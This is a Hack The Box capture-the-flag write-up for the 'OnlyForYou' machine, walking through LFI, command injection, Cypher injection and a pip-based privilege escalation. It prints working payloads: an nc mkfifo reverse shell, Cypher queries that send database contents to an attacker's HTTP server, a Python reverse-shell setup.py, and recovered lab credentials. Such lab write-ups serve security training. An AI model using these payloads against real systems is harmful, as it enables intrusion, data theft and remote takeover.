OnlyForYou HTB Write Up
Scanning
To start with, let’s scan the open ports using nmap.
We found two basic open ports which are 22 and 80 that are commonly used, 22 for the ssh and 80 for the http web server.
User Flag
Add the domain to /etc/hosts so we can open the web view from our browser.
And here is the web view of only4you.htb.
The page itself is only a landing page with no interesting features other than the contact us form. But, by checking the source code of the page, we can find a subdomain of http://beta.only4you.com that we can visit.
Add the domain to /etc/hosts, then visit the web page.
The beta web page offers features to convert and resize image files, other than that it also gives us the options to download the source code. So, let’s download and check out the functions that control those features.
In the source code, we can find the download function. The function will check the body request of image then validates whether it has some LFI possibilities of attack. But, the validation itself is considered weak, because we can bypass them by naming the file to /{file-name} since it will search the file from the root directory.
Here’s some of the files that I found:
/etc/passwd
The first file that I checked was the /etc/passwd that shows that there are two users which are john and dev.
/etc/nginx/nginx.conf
Then, since the website is being hosted using nginx, I tried finding several default nginx configuration files.
/etc/nginx/sites-available/default
This file shows the two domains that is being deployed on the web server and it’s web directory.
With the provided information of the web directory, we can try to enumerate some possible file name.
/var/www/only4you.htb/app.py
The file app.py is one of the most common file in a python flask project. In the file, there’s the index function that controls the contact us form. We can see that it import a sendmessage method from form, this means we can try to download the form.py file
/var/www/only4you.htb/form.py
In the file, there’s an interesting line of code that uses the run() method. It takes the domain of the email body request and put it directly into the parameter.
This is a vulnerability that we can exploit to run a command injection attack which will spawn a foothold reverse shell for us. By sending a dummy request from the page, we can open the request from burp repeater to custom the body request and try several payload till it works.
I use a payload created using https://www.revshells.com/ (nc mkfifo) and add it next to the email.
asd@mail.com; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.12 3000 >/tmp/fThen, url-encode the email and send the request.
Remember to start a netcat listener beforehand.
With the reverse shell that we got, we can traverse and try to check out the directories. But, since it’s not a user shell yet, we need to to a horizontal pivoting technique. And to do that, we need to gather some informations that we can use such as checking the services.
After looking around the services, one of the service that is interesting was in the port of 8001. But since we cannot directly access the service, we need to port forward the port 8001 to the attacking machine and to do that we can use chisel.
https://github.com/jpillora/chisel
Since the box isn’t connected through the internet directly, we need to serve an http server from our machine and download the chisel from there. So, find a directory that we have access to such as the tmp folder and put the file there.
# client
./chisel_linux client [ATTACKER_IP]:9999 R:8001:127.0.0.1:8001
# reverse
chisel server --reverse -p 9999
With chisel, we can now checkout what port 8001 is for. But first, we need a credential to access them. This is a rabbit hole, since it doesn’t have any vulnerabilites that we might expect but the answer is actually really simple which is a weak credential.
Username: admin
Password: admin
Then, after we successfuly logged in, we can find an employee list with a search feature. From the services shown when we gather the information, there is a Neo4j service that might serve as the database for this service.
So, I tried out some cypher injection payload and here’s the result.
https://book.hacktricks.xyz/pentesting-web/sql-injection/cypher-injection-neo4j
# Server Version
' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM '<http://10.10.14.12:8000/?version=>' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //# Get labels
' OR 1=1 WITH 1 as a CALL db.labels() YIELD label LOAD CSV FROM '<http://10.10.14.12:8000/?label=>' + label AS r RETURN 0 as _0 //# List the keys of the property "user"
' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM '<http://10.10.14.12:8000/?'> + p +'='+toString(f[p]) as l RETURN 0 as _0 //
Now, we have two user credentials with the password still hashed, so we can use https://crackstation.net/ to try cracking them out.
password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6
10.10.11.210 - - [28/Apr/2023 21:03:09] "GET /?username=john HTTP/1.1" 200 -password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918
10.10.11.210 - - [28/Apr/2023 21:03:09] "GET /?username=admin HTTP/1.1" 200 -
Username: john
Password: ThisIs4You
Username: admin
Password: adminRemember, that we found a user of john before, now we can try connecting through the ssh with john’s credential.
After a successful attempt, we can find the user flag in john’s home directory.
Root Flag
First, we need to gather some informations regarding what commands that we can use as sudo. With sudo -l, we found that we can use pip3 to download any .tar.gz file from the service that is being deployed on port 3000.
So, to further investigate, we need to port forward the port 3000 to our attacking machine. The steps are the same with the port 8001.
After we open the port 3000 in the web, we found out that it serve as a Gogs service. With that in mind, since we can download a .tar.gz file from the repositories, we can use that to our advantage and create a setup.py file that has a reverse shell payload inside, and pip will automatically run it when downloading the file.
But first to access the repository, we need to sign in. Luckily john’s credential can still be used here.
So now, create a setup.py file with a reverse shell payload such as the one below and put it inside a folder. Then, zip the folder as .tar.gz and upload them to the repository
import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.12",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")There’s an important setting that we need to change to make it possible for us to download the file from the repository which is to make the visibility to public. There is also some kind of cropnjob going on in the background that will automatically reset any changes made in the repository, so keep it that in mind.
After that, all we need is to download the raw file of the payload that we created before.
Remember to start the netcat beforehand to catch the reverse shell. The root flag will be in the root directory.
